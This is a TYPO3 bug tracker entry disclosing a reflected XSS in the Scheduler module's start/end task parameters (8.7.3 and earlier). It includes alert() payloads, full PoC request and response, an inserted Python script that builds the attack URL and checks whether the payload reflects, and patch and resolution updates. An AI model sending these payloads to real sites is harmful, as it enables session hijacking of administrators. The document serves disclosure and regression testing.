Bug #82079: XSS in scheduler
Status: Closed
% Done: 100%
Description
I would like to inform you about a security issue that I have found in the Scheduler plugin of the TYPO3 CMS (checked on version 8.7.3); specifically, it is reachable in the "Scheduler" section of the Backend administrative console.
The Scheduler plugin of TYPO3 turns out to be vulnerable to Reflected Cross-Site Scripting in the requests to Add or Edit a task, specifically in the two parameters "tx_scheduler%5Bstart%5D" and "tx_scheduler%5Bend%5D".
Technical Details
=================
The scenario to reproduce the security issue is described below.
Proof of Concept:
To replicate the issue, an authenticated user (with permission to create/edit tasks) has to click the button "Add Task" or "Edit Task" in the Scheduler area.
It is then sufficient to grab the request being sent to the server and add the payloads to the two vulnerable parameters "tx_scheduler%5Bstart%5D" and "tx_scheduler%5Bend%5D"; the submitted payloads are reflected in the response.
EXAMPLE
Payloads:
krup3z%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyflbjwmu6m1
de6gi%22%3e%3cscript%3ealert(2)%3c%2fscript%3eh3wq9ysmjag
ORIGINAL REQUEST:
----------------------------------
POST /typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 479
Referer: http://X.X.X.X/typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add
Cookie: be_lastLoginProvider=1433416747; be_typo_user=3c65beedf9f4f132c2bd20ad74d38314
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
tx_scheduler%5Buid%5D=0&previousCMD=add&tx_scheduler%5Bdisable%5D=0&tx_scheduler%5Bclass%5D=TYPO3%5CCMS%5CExtensionmanager%5CTask%5CUpdateExtensionListTask&tx_scheduler%5Btype%5D=1&tx_scheduler%5Btask_group%5D=0&tx_scheduler%5Bstart%5D_hr=11%3A10+24-07-2017&tx_scheduler%5Bstart%5D=1500887453&tx_scheduler%5Bend%5D_hr=&tx_scheduler%5Bend%5D=&tx_scheduler%5Bfrequency%5D=&tx_scheduler%5Bmultiple%5D=0&tx_scheduler%5Bmultiple%5D=1&tx_scheduler%5Bdescription%5D=dgfdfagdfag&CMD=save
PoC REQUEST:
-----------------------
GET /typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add&tx_scheduler%5Buid%5D=0&previousCMD=add&tx_scheduler%5Bdisable%5D=0&tx_scheduler%5Bclass%5D=TYPO3%5CCMS%5CExtensionmanager%5CTask%5CUpdateExtensionListTask&tx_scheduler%5Btype%5D=1&tx_scheduler%5Btask_group%5D=0&tx_scheduler%5Bstart%5D_hr=11%3A10+24-07-2017&tx_scheduler%5Bstart%5D=15008874533rup3z%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyflbjwmu6m1&tx_scheduler%5Bend%5D_hr=&tx_scheduler%5Bend%5D=de6gi%22%3e%3cscript%3ealert(2)%3c%2fscript%3eh3wq9ysmjag&tx_scheduler%5Bfrequency%5D=&tx_scheduler%5Bmultiple%5D=0&tx_scheduler%5Bmultiple%5D=1&tx_scheduler%5Bdescription%5D=dgfdfagdfag&CMD=save HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://X.X.X.X/typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add
Cookie: be_lastLoginProvider=1433416747; be_typo_user=3c65beedf9f4f132c2bd20ad74d38314
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
PoC RESPONSE:
--------------------------
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2017 09:35:42 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: 0
Last-Modified: Mon, 24 Jul 2017 09:35:42 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51666
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
[...]
<label>Task group</label></abbr></span><div class="form-control-wrap"><select name="tx_scheduler[task_group]" id="task_class" class="form-control"><option value="0" title=""></option></select></div></div></div>
<div class="form-section"><div class="row"><div class="form-group col-sm-6" id="task_start_col"><label><span class="t3-help-link" href="#" data-table="_MOD_system_txschedulerM1" data-field="task_start"><abbr class="t3-help-teaser">Start (HH:MM DD-MM-YYYY)</abbr></span></label><div class="form-control-wrap"><div class="input-group" id="tceforms-datetimefield-task_start_row-wrapper"><input name="tx_scheduler[start]_hr" value="20:48 11-08-2445" class="form-control t3js-datetimepicker t3js-clearable" data-date-type="datetime" type="text" id="tceforms-datetimefield-task_start_row"><input name="tx_scheduler[start]" value="15008874533rup3z"><script>alert(1)</script>yflbjwmu6m1" type="hidden"><span class="input-group-btn"><label class="btn btn-default" for="tceforms-datetimefield-task_start_row"><span class="fa fa-calendar"></span></label></span></div></div></div>
<div class="form-group col-sm-6" id="task_end_col"><span class="t3-help-link" href="#" data-table="_MOD_system_txschedulerM1" data-field="task_end"><abbr class="t3-help-teaser"><label>End (HH:MM DD-MM-YYYY)</label></abbr></span><div class="form-control-wrap"><div class="input-group" id="tceforms-datetimefield-task_end_row-wrapper"><input name="tx_scheduler[end]_hr" value="" class="form-control t3js-datetimepicker t3js-clearable" data-date-type="datetime" type="text" id="tceforms-datetimefield-task_end_row"><input name="tx_scheduler[end]" value="de6gi"><script>alert(2)</script>h3wq9ysmjag" type="hidden"><span class="input-group-btn"><label class="btn btn-default" for="tceforms-datetimefield-task_end_row"><span class="fa fa-calendar"></span></label></span></div></div></div></div></div>
[...]
A screenshot of the PoC is attached to better illustrate the vulnerability.
Vulnerable Versions:
TYPO3 8.7.3 and earlier
Checked on TYPO3/8.7.3
I have not received your response to my other two previous reports (I hope to receive at least a response from you). Anyway, I am always available if you need further explanations. Kind regards.
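The procedure above (capture the "Add task" POST, move it to a GET, overwrite the two date fields with the payloads, and look at how the response reflects them) as an added, runnable example. This script is not part of the report and not TYPO3 code: it builds the PoC URL from the captured form body, models the reflecting template line with a stand-in function `render_hidden` (the vulnerable raw concatenation beside an output-encoded variant), and parses a response body to decide whether the payload became a real `<script>` element or came back only as attribute text, which is the check to run again against a patched build. It runs offline: the request is built but never sent, and the moduleToken is the session-bound one from the capture, which a real run must replace with the current one.

```python
"""Added example: reproduce and regression-check the reflected XSS in the
TYPO3 Scheduler module's tx_scheduler[start] / tx_scheduler[end] fields.
Offline: the PoC request is only built, never sent."""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urlencode

# Payloads from the report, URL-decoded.
PAYLOAD_START = 'krup3z"><script>alert(1)</script>yflbjwmu6m1'
PAYLOAD_END = 'de6gi"><script>alert(2)</script>h3wq9ysmjag'

# Module URL and form body copied from the report's ORIGINAL REQUEST. The
# moduleToken is bound to the backend session; a live run needs the current one.
BASE_URL = ("http://X.X.X.X/typo3/index.php?M=system_txschedulerM1"
            "&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add")
ORIGINAL_BODY = (
    "tx_scheduler%5Buid%5D=0&previousCMD=add&tx_scheduler%5Bdisable%5D=0"
    "&tx_scheduler%5Bclass%5D=TYPO3%5CCMS%5CExtensionmanager%5CTask%5CUpdateExtensionListTask"
    "&tx_scheduler%5Btype%5D=1&tx_scheduler%5Btask_group%5D=0"
    "&tx_scheduler%5Bstart%5D_hr=11%3A10+24-07-2017&tx_scheduler%5Bstart%5D=1500887453"
    "&tx_scheduler%5Bend%5D_hr=&tx_scheduler%5Bend%5D=&tx_scheduler%5Bfrequency%5D="
    "&tx_scheduler%5Bmultiple%5D=0&tx_scheduler%5Bmultiple%5D=1"
    "&tx_scheduler%5Bdescription%5D=dgfdfagdfag&CMD=save"
)


def build_poc_url(base_url, post_body, payloads):
    """Turn the captured 'Add task' POST into the PoC GET: keep every field
    (the module accepts the save form via the query string, as the PoC shows)
    and overwrite the vulnerable ones with the payloads."""
    params = parse_qsl(post_body, keep_blank_values=True)
    poisoned = [(k, payloads.get(k, v)) for k, v in params]
    return base_url + "&" + urlencode(poisoned)


def render_hidden(name, value, escape):
    """Stand-in for the template line seen in the PoC response (not TYPO3's
    code). escape=False is the vulnerable pattern: the raw request value is
    concatenated into the attribute. escape=True is the hardened form."""
    if escape:
        value = html.escape(value, quote=True)
    return f'<input name="{name}" value="{value}" type="hidden">'


def coerce_timestamp(raw):
    """Defence in depth for these two fields: start/end are unix timestamps,
    so anything non-numeric is rejected before it can reach a template."""
    raw = raw.strip()
    return int(raw) if raw.isdigit() else None


class ReflectionScanner(HTMLParser):
    """Collects <script> bodies and <input> values from a response body."""

    def __init__(self):
        super().__init__()
        self.in_script = False
        self.scripts = []   # body of each <script> element, in order
        self.inputs = {}    # input name -> entity-decoded value attribute

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self.in_script = True
            self.scripts.append("")
        elif tag == "input" and "name" in a:
            self.inputs[a["name"]] = a.get("value") or ""

    def handle_data(self, data):
        if self.in_script:
            self.scripts[-1] += data

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False


def scan(body):
    s = ReflectionScanner()
    s.feed(body)
    s.close()
    return s


def reflected_unescaped(body, payload):
    """True when the injected quote closed the attribute and the payload's
    <script> became a real element, i.e. the XSS fires."""
    js = payload.split("<script>", 1)[1].split("</script>", 1)[0]
    return any(js in s for s in scan(body).scripts)


def reflected_escaped(body, field, payload):
    """True when the parameter came back intact as attribute text only,
    which is what a fixed build should show."""
    return scan(body).inputs.get(field) == payload


if __name__ == "__main__":
    url = build_poc_url(BASE_URL, ORIGINAL_BODY,
                        {"tx_scheduler[start]": PAYLOAD_START,
                         "tx_scheduler[end]": PAYLOAD_END})
    print("PoC URL:", url)
    for escape in (False, True):
        body = render_hidden("tx_scheduler[start]", PAYLOAD_START, escape)
        verdict = "VULNERABLE" if reflected_unescaped(body, PAYLOAD_START) else "safe"
        print("escaped" if escape else "raw", "->", verdict)
```

To retest a patched instance, fetch the URL `build_poc_url` returns with a valid backend session and moduleToken and feed the body to `reflected_unescaped`; a fixed build must return False there and True from `reflected_escaped` for both fields. Parsing the response rather than grepping for the literal payload avoids a false "fixed" verdict when the server merely re-encodes part of the string.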
Updated by Gerrit Code Review over 7 years ago
- Status changed from New to Under Review
Patch set 1 for branch master of project Teams/Security/TYPO3v4-Core has been pushed to the review server.
It is available at https://review.typo3.org/53699
Updated by Helmut Hummel over 7 years ago
Since Scheduler is an admin only module, we can publicly fix this issue.
Updated by Helmut Hummel over 7 years ago
- Project changed from 1716 to TYPO3 Core
- Category deleted (OW-A07: Cross Site Scripting)
Updated by Gerrit Code Review over 7 years ago
Patch set 1 for branch master of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/53720
Updated by Gerrit Code Review over 7 years ago
Patch set 1 for branch TYPO3_8-7 of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/53736
Updated by Gerrit Code Review over 7 years ago
Patch set 2 for branch TYPO3_8-7 of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/53736
Updated by Gerrit Code Review over 7 years ago
Patch set 1 for branch TYPO3_7-6 of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/53737
Updated by Wouter Wolters over 7 years ago
- Status changed from Under Review to Resolved
- % Done changed from 0 to 100
Applied in changeset bb60d69724a5211569f116a859df82042c1e90fa.